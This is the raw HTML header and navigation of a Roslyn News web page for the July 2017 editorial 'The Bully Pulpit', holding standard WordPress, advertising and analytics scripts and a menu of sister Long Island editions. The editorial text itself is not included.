<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en-US"> <!--<![endif]-->
<head>
<script type='text/javascript'>
  (function() {
    var useSSL = 'https:' == document.location.protocol;
    var src = (useSSL ? 'https:' : 'http:') +
        '//www.googletagservices.com/tag/js/gpt.js';
    document.write('<scr' + 'ipt src="' + src + '"></scr' + 'ipt>');
  })();
</script>

<script type='text/javascript'>
  googletag.cmd.push(function() {
    googletag.defineSlot('/33457410/1x1Ros', [1, 1], 'div-gpt-ad-1463590648591-0').addService(googletag.pubads());
    googletag.defineSlot('/33457410/Ros_ATF_Cube', [300, 250], 'div-gpt-ad-1463590648591-1').addService(googletag.pubads());
    googletag.defineSlot('/33457410/Ros_728x90_pgal', [728, 90], 'div-gpt-ad-1463590648591-2').addService(googletag.pubads());
    googletag.defineSlot('/33457410/Ros_int_CubeA', [300, 250], 'div-gpt-ad-1463590648591-3').addService(googletag.pubads());
    googletag.defineSlot('/33457410/Ros_int_CubeB', [300, 250], 'div-gpt-ad-1463590648591-4').addService(googletag.pubads());
    googletag.defineSlot('/33457410/Ros_Leader', [728, 90], 'div-gpt-ad-1463590648591-5').addService(googletag.pubads());
    googletag.defineSlot('/33457410/Roslyn_InnerPage_Leader', [728, 90], 'div-gpt-ad-1463590648591-6').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.pubads().enableSyncRendering();
    googletag.enableServices();
  });
</script>



<!-- /33457410/1x1Ros -->
<div id='div-gpt-ad-1463590648591-0' style='height:1px; width:1px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1463590648591-0'); });
</script>
</div>
    <title>Editorial: The Bully Pulpit | Roslyn News</title>
    <meta charset="UTF-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="http://roslyn-news.com/xmlrpc.php" />
    <meta property="og:image" content="http://roslyn-news.com/wp-content/uploads/2017/07/PaulLePage.jpg" /><meta name="author" content="Steve Mosco">
<link rel="icon" type="image/png" href="http://roslyn-news.com/wp-content/uploads/2016/10/Roslyn-square-16.png"><link rel="apple-touch-icon-precomposed" sizes="76x76" href="http://roslyn-news.com/wp-content/uploads/2016/10/Roslyn-square-76.png"/><link rel="apple-touch-icon-precomposed" sizes="120x120" href="http://roslyn-news.com/wp-content/uploads/2016/10/Roslyn-square-120.png"/><link rel="apple-touch-icon-precomposed" sizes="152x152" href="http://roslyn-news.com/wp-content/uploads/2016/10/Roslyn-square-152.png"/><link rel="apple-touch-icon-precomposed" sizes="114x114" href="http://roslyn-news.com/wp-content/uploads/2016/10/Roslyn-square-114.png"/><link rel="apple-touch-icon-precomposed" sizes="144x144" href="http://roslyn-news.com/wp-content/uploads/2016/10/Roslyn-square-144.png"/><link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//s.gravatar.com' />
<link rel='dns-prefetch' href='//maps.googleapis.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Roslyn News &raquo; Feed" href="http://roslyn-news.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Roslyn News &raquo; Comments Feed" href="http://roslyn-news.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Roslyn News &raquo; Editorial: The Bully Pulpit Comments Feed" href="http://roslyn-news.com/editorial-the-bully-pulpit/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/roslyn-news.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.5"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='simple-payments-css'  href='http://roslyn-news.com/wp-content/plugins/jetpack/modules/simple-payments/simple-payments.css?ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='events-manager-css'  href='http://roslyn-news.com/wp-content/plugins/events-manager/includes/css/events_manager.css?ver=5.7' type='text/css' media='all' />
<link rel='stylesheet' id='events-manager-pro-css'  href='http://roslyn-news.com/wp-content/plugins/events-manager-pro/includes/css/events-manager-pro.css?ver=2.4' type='text/css' media='all' />
<link rel='stylesheet' id='google_font_open_sans-css'  href='http://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C400%2C600%2C700&#038;ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='google_font_roboto-css'  href='http://fonts.googleapis.com/css?family=Roboto%3A500%2C400italic%2C700%2C500italic%2C400%2C300&#038;ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='http://roslyn-news.com/wp-content/themes/Newspaper/style.css?ver=6.1c' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-child-css'  href='http://roslyn-news.com/wp-content/themes/Newspaper-child/style.css?ver=6.1c' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css'  href='http://roslyn-news.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.11' type='text/css' media='all' />
<link rel='stylesheet' id='open-sans-css'  href='https://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C300%2C400%2C600&#038;subset=latin%2Clatin-ext&#038;ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://roslyn-news.com/wp-content/plugins/jetpack/css/jetpack.css?ver=5.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4'></script>
<script type='text/javascript'>
jQuery(document).ready(function(jQuery){jQuery.datepicker.setDefaults({"closeText":"Close","currentText":"Today","monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Previous","dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"dateFormat":"MM d, yy","firstDay":1,"isRTL":false});});
</script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/jquery/ui/menu.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/wp-a11y.min.js?ver=4.7.5'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var uiAutocompleteL10n = {"noResults":"No results found.","oneResult":"1 result found. Use up and down arrow keys to navigate.","manyResults":"%d results found. Use up and down arrow keys to navigate.","itemSelected":"Item selected."};
/* ]]> */
</script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/jquery/ui/resizable.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/jquery/ui/draggable.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/jquery/ui/button.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-includes/js/jquery/ui/dialog.min.js?ver=1.11.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var EM = {"ajaxurl":"http:\/\/roslyn-news.com\/wp-admin\/admin-ajax.php","locationajaxurl":"http:\/\/roslyn-news.com\/wp-admin\/admin-ajax.php?action=locations_search","firstDay":"1","locale":"en","dateFormat":"mm\/dd\/yy","ui_css":"http:\/\/roslyn-news.com\/wp-content\/plugins\/events-manager\/includes\/css\/jquery-ui.min.css","show24hours":"0","is_ssl":"","bookingInProgress":"Please wait while the booking is being submitted.","tickets_save":"Save Ticket","bookingajaxurl":"http:\/\/roslyn-news.com\/wp-admin\/admin-ajax.php","bookings_export_save":"Export Bookings","bookings_settings_save":"Save Settings","booking_delete":"Are you sure you want to delete?","booking_offset":"30","bb_full":"Sold Out","bb_book":"Book Now","bb_booking":"Booking...","bb_booked":"Booking Submitted","bb_error":"Booking Error. Try again?","bb_cancel":"Cancel","bb_canceling":"Canceling...","bb_cancelled":"Cancelled","bb_cancel_error":"Cancellation Error. Try again?","txt_search":"Search","txt_searching":"Searching...","txt_loading":"Loading...","cache":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://roslyn-news.com/wp-content/plugins/events-manager/includes/js/events-manager.js?ver=5.7'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-content/plugins/events-manager-pro/includes/js/events-manager-pro.js?ver=4.7.5'></script>
<script type='text/javascript' src='http://roslyn-news.com/wp-content/plugins/post-sharing-network/inc/wireframe/v1.10/js/jquery.wireframe.js?ver=4.7.5'></script>
<link rel='https://api.w.org/' href='http://roslyn-news.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://roslyn-news.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://roslyn-news.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Editorial: Yes And No' href='http://roslyn-news.com/editorial-yes-and-no/' />
<link rel='next' title='Supervisor Bosworth And Town Board Host Annual Intern Breakfast' href='http://roslyn-news.com/supervisor-bosworth-and-town-board-host-annual-intern-breakfast/' />
<link rel="canonical" href="http://roslyn-news.com/editorial-the-bully-pulpit/" />
<link rel='shortlink' href='http://wp.me/p7ucl3-2za' />
<link rel="alternate" type="application/json+oembed" href="http://roslyn-news.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Froslyn-news.com%2Feditorial-the-bully-pulpit%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://roslyn-news.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Froslyn-news.com%2Feditorial-the-bully-pulpit%2F&#038;format=xml" />
<!-- SLP Custom CSS -->
<style type="text/css">
div#map.slp_map {
width:100%;
height:480px;
}
div#slp_tagline {
width:100%;
}
</style>

		<style type="text/css">
			.em-coupon-code { width:150px; }
			#em-coupon-loading { display:inline-block; width:16px; height: 16px; margin-left:4px; background:url(http://roslyn-news.com/wp-content/plugins/events-manager-pro/includes/images/spinner.gif)}
			.em-coupon-message { display:inline-block; margin:5px 0px 0px 105px; text-indent:22px; }
			.em-coupon-success { color:green; background:url(http://roslyn-news.com/wp-content/plugins/events-manager-pro/includes/images/success.png) 0px 0px no-repeat }
			.em-coupon-error { color:red; background:url(http://roslyn-news.com/wp-content/plugins/events-manager-pro/includes/images/error.png) 0px 0px no-repeat }
			.em-cart-coupons-form .em-coupon-message{ margin:5px 0px 0px 0px; }
			#em-coupon-loading { margin-right:4px; }	
		</style>
		
<link rel='dns-prefetch' href='//v0.wordpress.com'>
<link rel='dns-prefetch' href='//jetpack.wordpress.com'>
<link rel='dns-prefetch' href='//s0.wp.com'>
<link rel='dns-prefetch' href='//s1.wp.com'>
<link rel='dns-prefetch' href='//s2.wp.com'>
<link rel='dns-prefetch' href='//public-api.wordpress.com'>
<link rel='dns-prefetch' href='//0.gravatar.com'>
<link rel='dns-prefetch' href='//1.gravatar.com'>
<link rel='dns-prefetch' href='//2.gravatar.com'>
<style type='text/css'>img#wpstats{display:none}</style><!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://roslyn-news.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE  8]><link rel="stylesheet" type="text/css" href="http://roslyn-news.com/wp-content/plugins/js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]-->
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Editorial: The Bully Pulpit" />
<meta property="og:url" content="http://roslyn-news.com/editorial-the-bully-pulpit/" />
<meta property="og:description" content="Many local schools rightfully have anti-bullying programs that call on students and teachers to recognize schoolyard bullying when it is happening, stand up to it and stamp it out before it goes to…" />
<meta property="article:published_time" content="2017-07-14T17:25:19+00:00" />
<meta property="article:modified_time" content="2017-07-14T17:25:19+00:00" />
<meta property="og:site_name" content="Roslyn News" />
<meta property="og:image" content="http://roslyn-news.com/wp-content/uploads/2017/07/PaulLePage.jpg" />
<meta property="og:image:width" content="269" />
<meta property="og:image:height" content="293" />
<meta property="og:locale" content="en_US" />
<meta name="twitter:site" content="@RoslynNews" />
<meta name="twitter:image" content="http://roslyn-news.com/wp-content/uploads/2017/07/PaulLePage.jpg?w=240" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:creator" content="@RoslynNews" />

<!-- JS generated by theme -->

<script>
    

var tdBlocksArray = []; //here we store all the items for the current page

//td_block class - each ajax block uses a object of this class for requests
function tdBlock() {
    this.id = '';
    this.block_type = 1; //block type id (1-234 etc)
    this.atts = '';
    this.td_column_number = '';
    this.td_current_page = 1; //
    this.post_count = 0; //from wp
    this.found_posts = 0; //from wp
    this.max_num_pages = 0; //from wp
    this.td_filter_value = ''; //current live filter value
    this.is_ajax_running = false;
    this.td_user_action = ''; // load more or infinite loader (used by the animation)
    this.header_color = '';
    this.ajax_pagination_infinite_stop = ''; //show load more at page x
}

    
    
        // td_js_generator - mini detector
        (function(){
            var htmlTag = document.getElementsByTagName("html")[0];

            if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
                htmlTag.className += ' ie10';
            }

            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
                htmlTag.className += ' ie11';
            }

            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
                htmlTag.className += ' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if ( user_agent.indexOf("android") > -1 ) {
                htmlTag.className += ' td-md-is-android';
            }

            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
                htmlTag.className += ' td-md-is-os-x';
            }

            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
               htmlTag.className += ' td-md-is-chrome';
            }

            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
                htmlTag.className += ' td-md-is-firefox';
            }

            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
                htmlTag.className += ' td-md-is-safari';
            }

        })();




        var tdLocalCache = {};

        ( function () {
            "use strict";

            tdLocalCache = {
                data: {},
                remove: function (resource_id) {
                    delete tdLocalCache.data[resource_id];
                },
                exist: function (resource_id) {
                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
                },
                get: function (resource_id) {
                    return tdLocalCache.data[resource_id];
                },
                set: function (resource_id, cachedData) {
                    tdLocalCache.remove(resource_id);
                    tdLocalCache.data[resource_id] = cachedData;
                }
            };
        })();

    
    
var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":324}];
var td_animation_stack_effect="type0";
var tds_animation_stack=true;
var td_animation_stack_specific_selectors=".entry-thumb, img";
var td_animation_stack_general_selectors=".td-animation-stack img, .post img";
var td_ajax_url="http:\/\/roslyn-news.com\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=6.7";
var td_get_template_directory_uri="http:\/\/roslyn-news.com\/wp-content\/themes\/Newspaper";
var tds_snap_menu="snap";
var tds_logo_on_sticky="";
var tds_header_style="";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_theme_color_site_wide="#4db2ec";
var tds_smart_sidebar="enabled";
var tdThemeName="Newspaper";
var td_magnific_popup_translation_tPrev="Previous (Left arrow key)";
var td_magnific_popup_translation_tNext="Next (Right arrow key)";
var td_magnific_popup_translation_tCounter="%curr% of %total%";
var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded.";
var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded.";
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>


<!-- Header style compiled by theme -->

<style>
    
.block-title > span,
    .block-title > a,
    .block-title > label,
    .widgettitle,
    .widgettitle:after,
    .td-trending-now-title,
    .td-trending-now-wrapper:hover .td-trending-now-title,
    .wpb_tabs li.ui-tabs-active a,
    .wpb_tabs li:hover a,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab.vc_active > a,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab:hover > a,
    .td-related-title .td-cur-simple-item,
    .woocommerce .product .products h2,
    .td-subcat-filter .td-subcat-dropdown:hover .td-subcat-more,
    .td-weather-information:before,
    .td-weather-week:before {
        background-color: #222222;
    }

    .woocommerce div.product .woocommerce-tabs ul.tabs li.active {
    	background-color: #222222 !important;
    }

    .block-title,
    .td-related-title,
    .wpb_tabs .wpb_tabs_nav,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container,
    .woocommerce div.product .woocommerce-tabs ul.tabs:before {
        border-color: #222222;
    }
</style>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-65941892-5', 'auto');
  ga('send', 'pageview');

</script><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head>

<body class="post-template-default single single-post postid-9868 single-format-standard networkpost editorial-the-bully-pulpit wpb-js-composer js-comp-ver-4.11 vc_responsive td-animation-stack-type0 td-full-layout" itemscope="itemscope" itemtype="http://schema.org/WebPage">



<div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>

<div id="td-outer-wrap">

    <div class="td-transition-content-and-menu td-mobile-nav-wrap">
        <div id="td-mobile-nav">
    <!-- mobile menu close -->
    <div class="td-mobile-close">
        <a href="#">CLOSE</a>
        <div class="td-nav-triangle"></div>
    </div>

    <div class="td-mobile-content">
        <div class="menu-main-menu-container"><ul id="menu-main-menu" class=""><li id="menu-item-130" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first menu-item-130"><a href="http://roslyn-news.com">Home</a></li>
<li id="menu-item-131" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-131"><a href="http://roslyn-news.com/category/news/">Roslyn News</a></li>
<li id="menu-item-205" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-205"><a href="http://roslyn-news.com/events/">Events</a>
<ul class="sub-menu">
	<li id="menu-item-1872" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1872"><a href="http://www.roslyn-news.com/events">All Events</a></li>
</ul>
</li>
<li id="menu-item-136" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136"><a href="http://roslyn-news.com/category/school-news/">School News</a></li>
<li id="menu-item-7567" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7567"><a href="http://roslyn-news.com/category/sports/">Sports</a></li>
<li id="menu-item-7566" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7566"><a href="http://roslyn-news.com/category/obituaries/">Obituaries</a></li>
<li id="menu-item-9832" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-9832"><a href="http://roslyn-news.com/category/opinion/">Opinion</a>
<ul class="sub-menu">
	<li id="menu-item-9833" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9833"><a href="http://roslyn-news.com/category/opinion/columns/">Columns</a></li>
	<li id="menu-item-9834" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-9834"><a href="http://roslyn-news.com/category/opinion/editorials/">Editorials</a></li>
	<li id="menu-item-9835" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9835"><a href="http://roslyn-news.com/category/opinion/letters-to-the-editor/">Letters to the Editor</a></li>
</ul>
</li>
<li id="menu-item-7429" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7429"><a href="http://roslyn-news.com/category/magazine/">Magazine</a></li>
<li id="menu-item-8711" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8711"><a href="http://longislandweekly.com/category/specials/">Specials</a>
<ul class="sub-menu">
	<li id="menu-item-8720" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8720"><a href="http://longislandweekly.com/category/specials/automotive/">Automotive</a></li>
	<li id="menu-item-8713" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8713"><a href="http://longislandweekly.com/category/specials/banking-finance/">Banking &#038; Finance</a></li>
	<li id="menu-item-8712" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8712"><a href="http://longislandweekly.com/category/specials/camps-schools/">Camps &#038; Schools</a></li>
	<li id="menu-item-8714" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8714"><a href="http://longislandweekly.com/category/specials/automotive/">Education</a></li>
	<li id="menu-item-8715" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8715"><a href="http://longislandweekly.com/category/specials/healthy-living">Healthy Living</a></li>
	<li id="menu-item-8716" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8716"><a href="http://longislandweekly.com/category/specials/asa-house-home/">Home Design</a></li>
	<li id="menu-item-8717" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8717"><a href="http://longislandweekly.com/category/specials/senior-living/">Senior Living</a></li>
	<li id="menu-item-8718" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8718"><a href="http://longislandweekly.com/category/specials/vacation-travel/">Vacation &#038; Travel</a></li>
	<li id="menu-item-8719" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8719"><a href="http://longislandweekly.com/category/specials/wine-dine/">Wine &#038; Dine</a></li>
</ul>
</li>
<li id="menu-item-9527" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9527"><a href="https://longislandweekly.com/category/classifieds/">Classifieds</a></li>
</ul></div>    </div>
</div>    </div>

        <div class="td-transition-content-and-menu td-content-wrap">



<!--
Header style 1
-->

<div class="td-header-wrap td-header-style-1">

    <div class="td-header-top-menu-full">
        <div class="td-container td-header-row td-header-top-menu">
            
    <div class="top-bar-style-1">
        
<div class="td-header-sp-top-menu">


	<div class="td_data_time">Tuesday, August 15, 2017</div><div class="menu-top-container"><ul id="menu-top-bar" class="top-header-menu"><li id="menu-item-7571" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-first td-menu-item td-normal-menu menu-item-7571"><a href="http://antonnews.com/">Edition</a>
<ul class="sub-menu">
	<li id="menu-item-9703" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9703"><a href="https://longislandweekly.com">Long Island Weekly</a></li>
	<li id="menu-item-9485" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9485"><a href="http://farmingdale-observer.com/">Farmingdale</a></li>
	<li id="menu-item-9486" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9486"><a href="http://floralparkdispatch.com/">Floral Park</a></li>
	<li id="menu-item-9487" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9487"><a href="http://gardencity-life.com/">Garden City</a></li>
	<li id="menu-item-9488" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9488"><a href="http://glencoverecordpilot.com/">Glen Cove</a></li>
	<li id="menu-item-9489" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9489"><a href="http://greatneckrecord.com/">Great Neck</a></li>
	<li id="menu-item-9490" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9490"><a href="http://hicksvillenews.com/">Hicksville</a></li>
	<li id="menu-item-9491" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9491"><a href="http://levittown-tribune.com/">Levittown ∙ Wantagh</a></li>
	<li id="menu-item-9492" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9492"><a href="http://Manhasset">Manhasset</a></li>
	<li id="menu-item-9493" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9493"><a href="http://www.massapequaobserver.com/">Massapequa</a></li>
	<li id="menu-item-9494" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9494"><a href="http://mineolaamerican.com/">Mineola</a></li>
	<li id="menu-item-9495" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9495"><a href="http://newhydeparkillustrated.com/">New Hyde Park</a></li>
	<li id="menu-item-9496" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9496"><a href="http://oysterbayenterprisepilot.com/">Oyster Bay</a></li>
	<li id="menu-item-9497" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9497"><a href="http://plainviewoldbethpageherald.com/">Plainview ∙ Old Bethpage</a></li>
	<li id="menu-item-9498" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9498"><a href="http://portwashington-news.com/">Port Washington</a></li>
	<li id="menu-item-9499" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9499"><a href="http://syossetjerichotribune.com/">Syosset ∙ Jericho</a></li>
	<li id="menu-item-9500" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9500"><a href="http://thewestburytimes.com/">Westbury ∙ Carle Place</a></li>
</ul>
</li>
<li id="menu-item-7568" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-7568"><a href="http://roslyn-news.com/advertise/">Advertise</a></li>
<li id="menu-item-7569" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-7569"><a href="http://antonnews.com/subscribe/">Subscribe</a></li>
